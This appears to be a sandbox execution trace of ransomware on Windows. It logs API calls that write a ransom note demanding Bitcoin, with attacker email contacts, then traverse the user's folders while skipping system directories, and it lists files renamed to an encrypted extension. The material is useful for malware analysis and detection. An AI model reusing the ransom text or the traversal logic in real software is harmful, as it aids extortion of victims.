	[0202.131] CloseHandle (hObject=0x2c0) returned 1
	[0202.131] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.132] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.132] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0202.132] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\HELP_DECRYPT_YOUR_FILES.HTML") returned 86
	[0202.132] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0202.134] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0202.134] WriteFile (in: hFile=0x2c0, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0202.137] CloseHandle (hObject=0x2c0) returned 1
	[0202.137] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.137] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.138] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.138] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0202.139] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0202.139] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0202.140] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0202.140] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0202.140] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0202.141] CloseHandle (hObject=0x2c0) returned 1
	[0202.141] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0x92007d39, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9202dfdd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0202.141] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*") returned 61
	[0202.141] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.141] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*") returned 0x3d
	[0202.141] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="windows") returned 0x0
	[0202.142] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.142] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="boot") returned 0x0
	[0202.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.143] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="system volume information") returned 0x0
	[0202.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.143] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0202.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.143] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="temp") returned 0x0
	[0202.143] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="program files") returned 0x0
	[0202.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="program files (x86)") returned 0x0
	[0202.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="appdata") returned 0x0
	[0202.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.144] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="application data") returned 0x0
	[0202.144] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="winnt") returned 0x0
	[0202.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="tmp") returned 0x0
	[0202.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="cache") returned 0x0
	[0202.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.145] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="temporary internet files") returned 0x0
	[0202.145] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.146] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="webcache") returned 0x0
	[0202.146] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.146] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="inetcache") returned 0x0
	[0202.146] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.146] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="nvidia") returned 0x0
	[0202.146] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.146] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="packages") returned 0x0
	[0202.146] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.147] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="cookies") returned 0x0
	[0202.147] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.147] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="programdata") returned 0x0
	[0202.147] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0202.147] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0202.147] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0x92007d39, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9202dfdd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0202.147] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0202.147] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91fe2a20, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91fe2a20, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x92007d39, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x17cf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ffcpakhrpmqfmcr.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FFCPAK~1.SCL")) returned 1
	[0202.147] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9202dfdd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9202dfdd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9202dfdd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0202.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92007d39, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x92007d39, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9202dfdd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0202.148] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x309286a0, ftLastAccessTime.dwHighDateTime=0x1d9734f, ftLastWriteTime.dwLowDateTime=0x309286a0, ftLastWriteTime.dwHighDateTime=0x1d9734f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0OT", cAlternateFileName="")) returned 1
	[0202.148] lstrcmpW (lpString1="V0OT", lpString2="..") returned 1
	[0202.148] lstrcmpW (lpString1="V0OT", lpString2=".") returned 1
	[0202.148] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg"
	[0202.148] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\"
	[0202.148] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\", lpString2="V0OT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT"
	[0202.148] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT"
	[0202.148] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\"
	[0202.148] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\"
	[0202.148] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*"
	[0202.149] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x309286a0, ftLastAccessTime.dwHighDateTime=0x1d9734f, ftLastWriteTime.dwLowDateTime=0x309286a0, ftLastWriteTime.dwHighDateTime=0x1d9734f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0202.149] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*") returned 66
	[0202.149] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.149] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*") returned 0x42
	[0202.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.149] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="windows") returned 0x0
	[0202.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.150] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="boot") returned 0x0
	[0202.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.150] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="system volume information") returned 0x0
	[0202.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.150] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0202.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="temp") returned 0x0
	[0202.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="program files") returned 0x0
	[0202.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="program files (x86)") returned 0x0
	[0202.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="appdata") returned 0x0
	[0202.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="application data") returned 0x0
	[0202.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="winnt") returned 0x0
	[0202.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="tmp") returned 0x0
	[0202.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="cache") returned 0x0
	[0202.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="temporary internet files") returned 0x0
	[0202.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="webcache") returned 0x0
	[0202.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="inetcache") returned 0x0
	[0202.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="nvidia") returned 0x0
	[0202.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="packages") returned 0x0
	[0202.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="cookies") returned 0x0
	[0202.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="programdata") returned 0x0
	[0202.154] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x309286a0, ftLastAccessTime.dwHighDateTime=0x1d9734f, ftLastWriteTime.dwLowDateTime=0x309286a0, ftLastWriteTime.dwHighDateTime=0x1d9734f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0202.155] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639514f0, ftCreationTime.dwHighDateTime=0x1d97066, ftLastAccessTime.dwLowDateTime=0xafde33e0, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0xafde33e0, ftLastWriteTime.dwHighDateTime=0x1d9750d, nFileSizeHigh=0x0, nFileSizeLow=0xfe93, dwReserved0=0x0, dwReserved1=0x0, cFileName="6y1J3FWzFsU1Mn9GW5.avi", cAlternateFileName="6Y1J3F~1.AVI")) returned 1
	[0202.155] lstrcmpW (lpString1="6y1J3FWzFsU1Mn9GW5.avi", lpString2="..") returned 1
	[0202.155] lstrcmpW (lpString1="6y1J3FWzFsU1Mn9GW5.avi", lpString2=".") returned 1
	[0202.155] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\"
	[0202.155] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\", lpString2="6y1J3FWzFsU1Mn9GW5.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\6y1J3FWzFsU1Mn9GW5.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\6y1J3FWzFsU1Mn9GW5.avi"
	[0202.155] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\6y1J3FWzFsU1Mn9GW5.avi") returned 85
	[0202.155] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.156] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\6y1J3FWzFsU1Mn9GW5.avi", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\6y1j3fwzfsu1mn9gw5.avi") returned 0x55
	[0202.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.156] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\6y1j3fwzfsu1mn9gw5.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0202.156] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\6y1j3fwzfsu1mn9gw5.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\6y1j3fwzfsu1mn9gw5.avi") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\6y1j3fwzfsu1mn9gw5.avi"
	[0202.156] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\6y1j3fwzfsu1mn9gw5.avi") returned 85
	[0202.156] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
